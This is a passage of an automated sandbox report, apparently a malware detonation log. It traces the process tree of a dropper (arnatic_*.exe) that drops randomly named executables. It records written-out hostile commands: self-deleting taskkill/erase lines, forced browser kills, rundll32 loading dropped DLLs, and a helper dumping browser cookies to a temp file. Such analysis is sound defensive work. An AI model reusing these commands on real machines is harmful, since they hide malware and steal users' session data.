                                                                                                • C:\Users\Admin\Documents\eJFn64vy8d6u1U9cNxx_T5kh.exe
                                                                                                  "C:\Users\Admin\Documents\eJFn64vy8d6u1U9cNxx_T5kh.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1632
                                                                                              • C:\Users\Admin\Documents\eG4DDdjxFbzVIStiZWr6GMFO.exe
                                                                                                "C:\Users\Admin\Documents\eG4DDdjxFbzVIStiZWr6GMFO.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4416
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                  7⤵
                                                                                                    PID:2560
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im chrome.exe
                                                                                                      8⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:4640
                                                                                                • C:\Users\Admin\Documents\e_KPjkr695Qid5LBnaD_FMGM.exe
                                                                                                  "C:\Users\Admin\Documents\e_KPjkr695Qid5LBnaD_FMGM.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4516
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "e_KPjkr695Qid5LBnaD_FMGM.exe" /f & erase "C:\Users\Admin\Documents\e_KPjkr695Qid5LBnaD_FMGM.exe" & exit
                                                                                                    7⤵
                                                                                                      PID:4816
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        8⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4724
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im "e_KPjkr695Qid5LBnaD_FMGM.exe" /f
                                                                                                        8⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:2240
                                                                                                  • C:\Users\Admin\Documents\PrqyVD1VxtWeWgutkOfmRh4c.exe
                                                                                                    "C:\Users\Admin\Documents\PrqyVD1VxtWeWgutkOfmRh4c.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4496
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4908
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4992
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4872
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1288
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                          PID:5676
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                            PID:1012
                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                          "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks computer location settings
                                                                                                          PID:3568
                                                                                                          • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                            "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                            8⤵
                                                                                                              PID:4724
                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks whether UAC is enabled
                                                                                                            PID:4384
                                                                                                        • C:\Users\Admin\Documents\cSn4hAW2R4NGZzKfmWLIQXpN.exe
                                                                                                          "C:\Users\Admin\Documents\cSn4hAW2R4NGZzKfmWLIQXpN.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:4652
                                                                                                          • C:\Users\Admin\Documents\cSn4hAW2R4NGZzKfmWLIQXpN.exe
                                                                                                            C:\Users\Admin\Documents\cSn4hAW2R4NGZzKfmWLIQXpN.exe
                                                                                                            7⤵
                                                                                                              PID:4456
                                                                                                            • C:\Users\Admin\Documents\cSn4hAW2R4NGZzKfmWLIQXpN.exe
                                                                                                              C:\Users\Admin\Documents\cSn4hAW2R4NGZzKfmWLIQXpN.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1112
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 160
                                                                                                                8⤵
                                                                                                                • Program crash
                                                                                                                PID:1560
                                                                                                          • C:\Users\Admin\Documents\ujWmlhi3XedZsFt52OkzbFn5.exe
                                                                                                            "C:\Users\Admin\Documents\ujWmlhi3XedZsFt52OkzbFn5.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4696
                                                                                                            • C:\Users\Admin\Documents\ujWmlhi3XedZsFt52OkzbFn5.exe
                                                                                                              C:\Users\Admin\Documents\ujWmlhi3XedZsFt52OkzbFn5.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4272
                                                                                                          • C:\Users\Admin\Documents\z9s8n0mcE46MKGfNzsVfuG2_.exe
                                                                                                            "C:\Users\Admin\Documents\z9s8n0mcE46MKGfNzsVfuG2_.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4608
                                                                                                          • C:\Users\Admin\Documents\HOtAAelrumIQEaFgtnrfX1of.exe
                                                                                                            "C:\Users\Admin\Documents\HOtAAelrumIQEaFgtnrfX1of.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4968
                                                                                                          • C:\Users\Admin\Documents\qXXaVFDl4f4pAYyJOw1SWbCc.exe
                                                                                                            "C:\Users\Admin\Documents\qXXaVFDl4f4pAYyJOw1SWbCc.exe"
                                                                                                            6⤵
                                                                                                            • Drops file in Drivers directory
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2276
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                              7⤵
                                                                                                                PID:5188
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                  8⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:4984
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.0.1438704236\58869974" -parentBuildID 20200403170909 -prefsHandle 1452 -prefMapHandle 1428 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 1532 gpu
                                                                                                                    9⤵
                                                                                                                      PID:5568
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.3.138424713\1610829951" -childID 1 -isForBrowser -prefsHandle 5432 -prefMapHandle 5428 -prefsLen 156 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 5444 tab
                                                                                                                      9⤵
                                                                                                                        PID:5272
                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.13.1075923509\1689919509" -childID 2 -isForBrowser -prefsHandle 4012 -prefMapHandle 4044 -prefsLen 7013 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 2720 tab
                                                                                                                        9⤵
                                                                                                                          PID:5940
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.20.1208845855\1977398781" -childID 3 -isForBrowser -prefsHandle 3428 -prefMapHandle 6020 -prefsLen 8017 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 6008 tab
                                                                                                                          9⤵
                                                                                                                            PID:5124
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                        7⤵
                                                                                                                        • Enumerates system info in registry
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:5680
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa935a4f50,0x7ffa935a4f60,0x7ffa935a4f70
                                                                                                                          8⤵
                                                                                                                            PID:5916
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:2516
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                                              8⤵
                                                                                                                                PID:5380
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2572 /prefetch:1
                                                                                                                                8⤵
                                                                                                                                  PID:4372
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1860 /prefetch:8
                                                                                                                                  8⤵
                                                                                                                                    PID:4948
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1812 /prefetch:2
                                                                                                                                    8⤵
                                                                                                                                      PID:5980
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
                                                                                                                                      8⤵
                                                                                                                                        PID:4188
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
                                                                                                                                        8⤵
                                                                                                                                          PID:4676
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
                                                                                                                                          8⤵
                                                                                                                                            PID:2244
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
                                                                                                                                            8⤵
                                                                                                                                              PID:5824
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                                              8⤵
                                                                                                                                                PID:6652
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7f8bba890,0x7ff7f8bba8a0,0x7ff7f8bba8b0
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6668
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6712
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3820 /prefetch:8
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6864
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 /prefetch:8
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6416
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1684 /prefetch:8
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5156
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2544 /prefetch:2
                                                                                                                                                          8⤵
                                                                                                                                                            PID:2120
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3736 /prefetch:8
                                                                                                                                                            8⤵
                                                                                                                                                              PID:6904
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5116
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4012 /prefetch:8
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2080
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:6224
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5008 /prefetch:8
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:2884
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:8
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:3776
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=768 /prefetch:8
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:4424
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:8
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:6968
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:4016
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:8
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:7112
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:8
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:2220
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1684 /prefetch:8
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:7156
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1796,8957734025361989713,9374775946949029935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1632 /prefetch:8
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:6296
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "cmd.exe" /C taskkill /F /PID 2276 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\qXXaVFDl4f4pAYyJOw1SWbCc.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:4564
                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                        taskkill /F /PID 2276
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:6256
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "cmd.exe" /C taskkill /F /PID 2276 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\qXXaVFDl4f4pAYyJOw1SWbCc.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:5876
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /F /PID 2276
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:6248
                                                                                                                                                                                    • C:\Users\Admin\Documents\iwK_luEG8vYn6WN5g3Ucf3ZZ.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\iwK_luEG8vYn6WN5g3Ucf3ZZ.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4196
                                                                                                                                                                                    • C:\Users\Admin\Documents\Lw1rY5ai_OriACx3p_VuxfGm.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\Lw1rY5ai_OriACx3p_VuxfGm.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:4728
                                                                                                                                                                                      • C:\Users\Admin\Documents\Lw1rY5ai_OriACx3p_VuxfGm.exe
                                                                                                                                                                                        C:\Users\Admin\Documents\Lw1rY5ai_OriACx3p_VuxfGm.exe
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4044
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:2208
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_7.exe
                                                                                                                                                                                    arnatic_7.exe
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:3756
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_7.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_7.exe
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:3872
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:852
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:2152
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:964
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              PID:1984
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_3.exe
                                                                                                                                                                            arnatic_3.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:2852
                                                                                                                                                                            • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
